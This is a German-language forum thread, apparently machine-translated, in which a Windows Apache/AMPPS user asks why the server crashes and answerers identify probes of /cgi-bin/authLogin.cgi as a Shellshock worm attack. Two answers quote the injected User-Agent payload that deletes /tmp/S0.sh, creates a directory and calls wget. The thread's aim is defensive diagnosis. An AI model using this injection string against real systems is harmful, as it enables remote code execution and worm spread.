Apache http server funktioniert nicht mehr

Hallo Freunde,

Ich bin mit Ampps-server mit php 5.3.29, in windows server datacenter.

leider bin ich immer die folgende Meldung im windows server und meine Website down.

Titel der Eingabeaufforderung:
Microsoft windows

Fenster Mit Der Meldung:
Apache http server funktioniert nicht mehr.

Ein problem verursacht das Programm nicht mehr ordnungsgemäß funktioniert. das Programm wird geschlossen und Sie werden benachrichtigt wenn eine Lösung verfügbar ist.

Trace:

Wenn ich tracing-error und access logs, fand ich die folgenden Protokolle als Ursache.

In Apache-access-log:

202.175.83.36 - - [10/Dec/2014:05:58:50 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
217.248.177.30 - - [10/Dec/2014:06:11:24 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
209.153.244.6 - - [10/Dec/2014:07:09:17 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
81.214.132.245 - - [10/Dec/2014:07:25:04 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335

Im Apache-error-log:

[Wed Dec 10 07:25:04.401073 2014] [cgi:error] [pid 2908:tid 1168] [client 81.214.132.245:36246] script not found or unable to stat: D:/Program Dateien/Ampps/www/cgi-bin/authLogin.cgi

Bitte helfen Sie mir.

InformationsquelleAutor karuppub | 2014-12-10

  1. 1

    Es ist ein Web-bot versucht zu bekommen, Behörde, so kann es wget und führen Sie so etwas wie S0.py, die ich vorstellen, dass ist ein Wurm, so dass die download-server kompromittiert ist.
    Id gerne eine Kopie S0.sh wenn Sie geschehen, um einen zu bekommen, geben Sie es an, exploit-db oder etwas ähnliches.
    Die geschickte Befehl ist:
    Get /cgi-bin/authLogin.cgi HTTP/1.1.Host: 127.0.0.1.User-Agent:() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget

    Die Datei ausgeführt wird, folgenden download.
    Ich nehme an, es gibt etwas über HDB_DATA, die ich gar nicht haben.
    "Information ist oberstes Gebot!"

    InformationsquelleAutor Mutified

  2. 0

    Wenn Sie versuchen, diese Datei zu öffnen, was passiert?

    D:/Program Dateien/Ampps/www/cgi-bin/authLogin.cgi

    Zeigt die Meldung, dass die Datei nicht vorhanden ist, wie dies durch die 404-Fehler und die Meldung "script not found".

    Ich weiß, dass es ist keine Datei dieses namens. aber jemand versuchen, auf diese Datei zuzugreifen. Sie können sehen, in einem apache access log mit unterschiedlichen ip-Adressen. ich denke, Sie versuchen, Zugriff auf apache. so wie um dies zu verhindern.

    InformationsquelleAutor NicholasDTC

  3. 0

    Schließlich verweigerte ich diesen client für den Zugriff auf die cgi-bin-Verzeichnis.

    im cgi-bin-Verzeichnis erstellt habe ich eine .htaccess-Datei

    Fügte ich folgende Zeile in .htaccess

    Deny From all.

    InformationsquelleAutor karuppub

  4. 0

    Ich glaube nicht, dass authLogin.cgi wirklich wichtig, ausser es kann jemand erlauben, um Sie auszuführen. Das problem ist, dass der Benutzer versucht oder erfolgreich beseitigt /tmp/S0.sh und erstellen Sie ein Verzeichnis php in den Ordner freigeben, und führen Sie dann wget.

    /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget

    Hier ist, was kam, nachdem alle, die Zeit der Fragen:
    http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html

    "S0.sh besteht aus zwei teilen ... der erste Teil macht die erste Einrichtung und downloads zusätzliche Programme, und dann den zweiten Teil installiert sich der Wurm und führt einige zusätzliche Befehle."

    Also es war ein echtes Vergnügen, den Fang dieser Aktion und zunächst wusste niemand zu nennen Shellshock. Es ist eine Kopie S0.sh es, und Sie können sehen, es ist ein Wurm, der ich vermutete, der Fall war.

    Von was ich gelesen habe, wird der Wurm nur beim surfen auf den IP-Adressraum auf der Suche für jedermann, das hören auf port 8080.

    bitte postet mögliche Antwort, und nicht nur links. diese können entfernt oder verändert werden.

    InformationsquelleAutor mutified

Schreibe einen Kommentar